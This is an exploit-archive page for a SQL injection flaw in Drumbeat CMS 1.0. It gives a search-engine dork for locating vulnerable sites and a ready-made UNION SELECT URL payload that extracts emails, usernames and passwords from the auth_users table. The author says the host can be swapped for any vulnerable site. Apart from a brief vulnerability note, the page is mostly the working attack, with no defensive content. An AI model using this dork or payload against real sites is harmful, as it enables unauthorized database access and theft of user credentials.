[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Drumbeat CMS SQL Injection Exploit
# Published : 2009-12-21
# Author : Sora
# Previous Title : Aurora CMS Remote SQL Injection Exploit
# Next Title : Angelo-emlak v1.0 Database Disclosure Vulnerability


# Vendor: http://www.drumbeatcms.com.au/
# Version: Version 1.0
# Tested on: Windows and Linux
-----------------------------------------
Drumbeat CMS SQL Injection Exploit
[+] Discovered and notified by Sora
A SQL injection exploit is found in Drumbeat CMS. The vulnerability exists in where there is an index.php page, such as index02.php?id=5. or index03.php?id=2.

Dork: "Powered by Drumbeat" inurl:index02.php

# Code: http://www.site.com/index02.php?id=-2+UNION+SELECT+ALL+group_concat(email,0x3a,username,0x3a,password)+from+auth_users--

You can usually replace the http://www.site.com/ with any site that is vulnerable to SQL injection.

Greetz: Bw0mp and the rest of the people from Incursio ex Subter!

# EOF #